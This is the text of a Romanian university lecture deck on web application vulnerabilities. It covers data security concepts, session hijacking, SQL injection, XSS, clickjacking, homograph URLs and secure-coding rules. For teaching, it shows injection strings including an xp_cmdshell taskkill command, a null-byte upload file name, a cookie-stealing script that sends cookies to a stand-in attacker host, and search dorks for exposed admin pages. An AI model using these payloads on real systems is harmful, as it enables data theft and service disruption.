![Page 1: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/1.jpg)
vulnerabilitatileaplicatiilor web
Dr. Sabin Buraga
www.purl.org/net/busaco
@busaco
![Page 2: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/2.jpg)
“Ceea ce se vede pe un obiecteste alt obiect ascuns.”
René Magritte
![Page 3: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/3.jpg)
ce inseamna securitatea datelor?
![Page 4: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/4.jpg)
securitatea este procesul de mentinerea unui nivel acceptabil de risc perceptibil
![Page 5: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/5.jpg)
security is a process, not an end state
Mitch Kabay
![Page 6: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/6.jpg)
securitatea datelor
confidentialitateaautentificareaautorizareaintegritatea
nerepudiereaintimitatea (privacy)
disponibilitatea
![Page 7: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/7.jpg)
confidentialitatea
imposibilitatea unei terte entitati sa aiba accesla datele vehiculate intre doi receptori
![Page 8: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/8.jpg)
autentificarea
presupune verificarea identitatii utilizatorului
![Page 9: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/9.jpg)
autentificarea
presupune verificarea identitatii utilizatorului
uzual, pe baza de nume + parola
![Page 10: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/10.jpg)
autorizarea
specifica actiunile (rolurile) pe care un utilizatorle poate realiza intr-un anumit context
![Page 11: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/11.jpg)
autorizarea
asociata autentificarii
![Page 12: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/12.jpg)
integritatea
implica detectarea incercarilor de modificareneautorizata a datelor transmise
![Page 13: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/13.jpg)
nerepudierea
asigura ca expeditorul unui mesaj nu poate afirmaca nu l-a trimis
![Page 14: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/14.jpg)
disponibilitatea
o anumita resursa este necesar sa poata fi accesatala momentul oportun
![Page 15: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/15.jpg)
intimitatea
vizeaza drepturile ce trebuie respectateprivind caracterul (subiectul) datelor vehiculate
![Page 16: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/16.jpg)
intimitatea
confundata, deseori, cu confidentialitatea
![Page 17: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/17.jpg)
securitatea webtrebuie sa ia in consideratie
clientul
interactiunea cu utilizatorul
datele personale stocate:cookie-uri, date off-line, cache etc.
transferurile asincronevia Ajax/Comet
existenta plugin-urilor si/sauextensiilor suspecte
…
![Page 18: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/18.jpg)
securitatea webtrebuie sa ia in consideratie
datele in tranzit
securitatea retelei schimbul sigur de mesaje intre diverse entitati
ne-repudierea datelor…
![Page 19: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/19.jpg)
securitatea webtrebuie sa ia in consideratie
serverul
securitatea serverului/serverelor Websecuritatea aplicatiilor
disponibilitatea serviciilor
![Page 20: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/20.jpg)
securitatea webtrebuie sa ia in consideratie
clientuldatele in tranzit
serverul
![Page 21: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/21.jpg)
securitatea webtrebuie sa ia in consideratie
clientuldatele in tranzit
serverul
atacurile pot viza oricare din cele 3 aspecte!
![Page 22: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/22.jpg)
vulnerabilitati
slabiciuni ale unui sistemhardware/software ce permit
utilizatorilor neautorizatisa aiba acces asupra lui
![Page 23: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/23.jpg)
vulnerabilitati
slabiciuni ale unui sistemhardware/software ce permit
utilizatorilor neautorizatisa aiba acces asupra lui
pot aparea si datoritaproastei administrari
![Page 24: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/24.jpg)
nici un sistem nu este 100% sigur
![Page 25: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/25.jpg)
modus operandi
1examinarea mediului
identificarea serviciilor publice
descoperireatipurilor + versiunilor aplicatiilor
generarea de erori &examinarea mesajelor obtinute
gasirea de informatii sensibile:cod-sursa, comentarii,
cimpuri ascunse ale formularelor,…
![Page 26: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/26.jpg)
modus operandi
2stabilirea tintei atacului
mecanismul de autentificare (login)
cimpurile de intrare ale formularelor web
managementul sesiunilor
infrastructura folosita:serverele de stocare a datelor,
serviciile aditionale – e.g., proxy,…
![Page 27: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/27.jpg)
care sunt cele mai uzuale tipuri de atacuri?
![Page 28: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/28.jpg)
la nivel de HTTP
analizarea pachetelor de date (network sniffing)
functioneaza pentru fluxuri de dateHTTP necriptate
![Page 29: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/29.jpg)
Wireshark – consultarea datelor transmise in retea
![Page 30: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/30.jpg)
la nivel de HTTP
analizarea pachetelor de date (network sniffing)
solutie de prevenire:HTTPS
folosirea HTTP peste (W)TLS(Wireless) Transport Layer Security
![Page 31: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/31.jpg)
la nivel de HTTP
deturnarea sesiunilor (session hijacking)
atacatorul determina SID-ul utilizatorului si il foloseste in scop propriu
![Page 32: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/32.jpg)
la nivel de HTTP
deturnarea sesiunilor (session hijacking)
analizarea campului Refererdintr-un mesaj de cerere HTTP
Referer:https://www.ebank.info/view/account?id=98755&jsessid=BAC13606AC22B81E5137F45F95EE7573
![Page 33: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/33.jpg)
la nivel de HTTP
deturnarea sesiunilor (session hijacking)
solutii de prevenire:
eliminarea SID-ului din URLstocarea SID-ului in campul User-Agent
utilizarea unui SID variabil
![Page 34: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/34.jpg)
SQL injection
scrierea unor interogari SQL care permit afisarea, alterarea, stergerea de date din baze de datevia formulare web ori direct, folosind URL-uri
![Page 35: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/35.jpg)
SQL injection
select * from customerswhere name=$name and pass=$pass
$name preluat din formular,cu valoarea '' or 1=1 --
![Page 36: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/36.jpg)
SQL injection
http://e-bankk.org/clients.php?client=3
in programul PHP exista:
select credit_card from clientswhere client=$client
![Page 37: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/37.jpg)
SQL injection
http://e-bankk.org/clients.php?client=3
in programul PHP exista:
select credit_card from clientswhere client=$client
ce se intimpla daca URI-ul estehttp://e-bankk.org/clients.php?client=client ?
![Page 38: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/38.jpg)
SQL injection
variatie:crearea de interogari SQL incorecte
pentru obtinerea de mesaje de eroare “interesante”
![Page 39: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/39.jpg)
SQL injection
http://www.phunds.biz/search?id=1+OR+gh=1
![Page 40: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/40.jpg)
SQL injection
http://www.phunds.biz/search?id=1+OR+gh=1
atacatorul poate obtine un mesaj precum:
[Microsoft][ODBC SQL Server Driver] [SQL Server] Invalid column name ’gh’.
SELECT group_id, securityName, maxSalesCharge, price, security_id, trade_date FROM fundsWHERE group_id = 1 OR gh=1 ORDER BY price DESC
![Page 41: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/41.jpg)
SQL injection
solutii de prevenire:
neutralizarea meta-caracterelor SQLprepared statements
utilizarea de framework-uri ORM (Object-Relational Mapping)
recurgerea la proceduri stocate…
![Page 42: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/42.jpg)
SQL injection
$sql = "select * from userswhere user = '" . $user . "'";
$rezultat = db_query ("select * from users where user = ?", $user);
incorect
corect
![Page 43: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/43.jpg)
SQL injection + command injection
utilizarea SQL pentru executia de comenzila nivel de shell
din cadrul serverului de baze de date
![Page 44: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/44.jpg)
SQL injection + command injection
SELECT * FROM users WHERE name = 'tuxy' ANDpass = ' '; xp_cmdshell 'taskkill /F /IM
sqlservr.exe' --'
![Page 45: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/45.jpg)
poisonous null-byte attack
folosirea caracterului NULLpentru plasarea de script-uri pe server
ce ulterior pot fi executate
![Page 46: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/46.jpg)
poisonous null-byte attack
atacatorul realizeaza upload-ulunei “imagini” – img.php%00.jpg
“Thank you! See your picture at img.php”
![Page 47: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/47.jpg)
XSS: cross-site scripting
“injectarea”, pentru executia directin navigatorul web, de cod JavaScript
![Page 48: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/48.jpg)
XSS: cross-site scripting
a se vizita si http://ha.ckers.org/xss.html
pentru exemple reale,a se consulta http://xssed.com/
![Page 49: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/49.jpg)
XSS: cross-site scripting
functioneaza mai ales in cadrulsiturilor web interactive:
forumuri, blog-uri, wiki-uri,…
![Page 50: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/50.jpg)
XSS: cross-site scripting
poate conduce sila furtul identitatii (phishing)
sau la plasarea de cod malware la client: CSRF – Cross-Site Request Forgery
in contextul mash-up-urilor, mai ales
![Page 51: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/51.jpg)
XSS: cross-site scripting
<img src="javascript:cod" />
un atacator poate redirectiona utilizatorulspre alt sit, poate preia valori de cookie-uri
ori poate bloca navigatorul web
![Page 52: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/52.jpg)
XSS: cross-site scripting
<script type="text/javascript">document.location.replace (
"http://phurt-uri.org/furt.php" + "?c=" + document.cookie);
</script>
furtul de cookie-uri (hijacking cookies)
![Page 53: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/53.jpg)
clickjacking
folosirea de cod JavaScript pentrua modifica textul redat de navigatorul web
utilizatorului sau pentru a manipulautilizatorul sa viziteze legaturi ascunse
http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html
![Page 54: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/54.jpg)
tabnabbing
recurgerea la cod JavaScript pentru a generaintr-un tab al navigatorului o replica
a unui formular de autentificarela un serviciu notoriu – e.g., Facebook, GMail
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
![Page 55: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/55.jpg)
exemplu real
pe baza unei vulnerabilitati XSS in filtrul HTMLal MySpace, atunci cind un utilizator vizualiza
profilul lui Tuxy, codul JavaScript il facea automatprieten al lui Tuxy + recurgea la Ajax pentrua insera script-ul malefic in profilul curent
social network worm
dupa 20 de ore, 1005831 cereriMySpace s-a “prabusit”
![Page 56: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/56.jpg)
exemplu real
Google UTF-7 holepaginile 404 oferite de Google nu specificau
codul de caractere utilizat
atacurile XSS codificate ca UTF-7 puteau fi accesatesi executate in cadrul Internet Explorer
http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
![Page 57: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/57.jpg)
probleme cauzate de URI/IRI-uri
inducerea in eroare a utilizatorului
exemplu:
http://[email protected]/
![Page 58: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/58.jpg)
probleme cauzate de URI/IRI-uri
codificarea defectuoasaa codurilor hexa
vulnerabilitati la unele servere web
![Page 59: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/59.jpg)
probleme cauzate de URI/IRI-uri
siturile avind domenii internationale(IDN – International Domain Names)atacuri bazate pe homografie
adobe.com ≠ adobe.com
![Page 60: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/60.jpg)
troienii web
situri/aplicatii web aparent folositoare,la care utilizatorul poate ajunge eventual
via redirectare automata
![Page 61: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/61.jpg)
troienii web
extensii sau plug-in-uri care includ cod malitios
![Page 62: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/62.jpg)
troienii web
suplimentar, pot recurge la XSS/CSRFsau la tehnici de tip social engineering
![Page 63: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/63.jpg)
detectarea posibilelor vulnerabilitati– datorate unor configuratii incorecte ori
implicite ale serverelor si/sau aplicatiilor web –se poate realiza apeland la un motor de cautare
![Page 64: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/64.jpg)
detectia versiunilor de softwarecu bug-uri cunoscute
"Apache/2.0.52 server at"
accesul la fisiere .bakinurl:index.php.bak
detectarea paginilor de administrare"admin login "
gasirea unor instalari impliciteintitle:"welcome to" intitle:internet IIS
![Page 65: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/65.jpg)
localizarea interfetelor spre sistemelede baze de date
inurl:main.php phpMyAdmin
cautarea de aplicatii instalate oria fisierelor de jurnalizare
inurl:error.log +filetype:log –cvs
cautarea unor mesaje de eroare generatede aplicatii ori de servere de baze de date"ASP.NET_SessionId" "data source="
![Page 66: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/66.jpg)
vezi si proiectul “Google Hack” Honeypot
http://ghh.sourceforge.net/
![Page 67: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/67.jpg)
securitatea unei aplicatii web
trebuie sa ia in consideratiearhitectura,
logica (functionalitatea),codul-sursa si
continutulin ansamblu
![Page 68: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/68.jpg)
securitatea unei aplicatii web
nu vizeaza vulnerabilitatile sistemului de operareori ale programelor auxiliare
![Page 69: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/69.jpg)
tipuri de vulnerabilitati web tipice
probleme de autentificare
managementul sesiunilor
injectarea de script-uri (XSS)ori comenzi SQL
![Page 70: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/70.jpg)
tipuri de vulnerabilitati web tipice
expunerea – involuntara – a informatiilor“delicate” (information disclosure)
accesul la codul-sursa orila fisierele de configurare a aplicatiei web
managementul incorectal configuratiei aplicatiei
![Page 71: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/71.jpg)
reguli/bune practici (Sverre Huseby, 2004)
do not underestimate the power of the dark side
![Page 72: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/72.jpg)
reguli/bune practici (Sverre Huseby, 2004)
use POST requests when actions have side effects
![Page 73: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/73.jpg)
reguli/bune practici (Sverre Huseby, 2004)
in a server-side context,there is no such thing as client-side security
![Page 74: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/74.jpg)
reguli/bune practici (Sverre Huseby, 2004)
always generate a new session IDonce the user logs in
![Page 75: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/75.jpg)
reguli/bune practici (Sverre Huseby, 2004)
never pass detailed error messages to the client
![Page 76: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/76.jpg)
reguli/bune practici (Sverre Huseby, 2004)
identify every possible meta-characterto a subsystem
![Page 77: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/77.jpg)
reguli/bune practici (Sverre Huseby, 2004)
when possible,pass data separate from control information
![Page 78: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/78.jpg)
reguli/bune practici (Sverre Huseby, 2004)
do not blindly trust the API documentation
![Page 79: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/79.jpg)
reguli/bune practici (Sverre Huseby, 2004)
identify all sources of input to the application
![Page 80: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/80.jpg)
reguli/bune practici (Sverre Huseby, 2004)
when filtering data,use white-listing rather than black-listing
![Page 81: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/81.jpg)
reguli/bune practici (Sverre Huseby, 2004)
create application-level logs
![Page 82: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/82.jpg)
reguli/bune practici (Sverre Huseby, 2004)
never use client-side scripts for security
![Page 83: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/83.jpg)
reguli/bune practici (Sverre Huseby, 2004)
pass as little internal state information as possibleto the client
![Page 84: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/84.jpg)
reguli/bune practici (Sverre Huseby, 2004)
don’t assume that requests will comein a certain order
![Page 85: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/85.jpg)
reguli/bune practici (Sverre Huseby, 2004)
filter all data before including them in a web page,no matter what the origin
![Page 86: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/86.jpg)
reguli/bune practici (Sverre Huseby, 2004)
stick to existing cryptographic algorithms,do not create your own
![Page 87: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/87.jpg)
reguli/bune practici (Sverre Huseby, 2004)
never store clear-text passwords
![Page 88: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/88.jpg)
reguli/bune practici (Sverre Huseby, 2004)
assume that server-side code is availableto attackers
![Page 89: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/89.jpg)
reguli/bune practici (Sverre Huseby, 2004)
security is not a product; it is a process
![Page 90: Sabin Buraga – Vulnerabilitatile aplicatiilor Web](https://reader034.vdocuments.site/reader034/viewer/2022052206/5569a587d8b42a69728b50bd/html5/thumbnails/90.jpg)
http://planet-websecurity.org/feed/
http://www.owasp.org/
http://simonwillison.net/tags/security/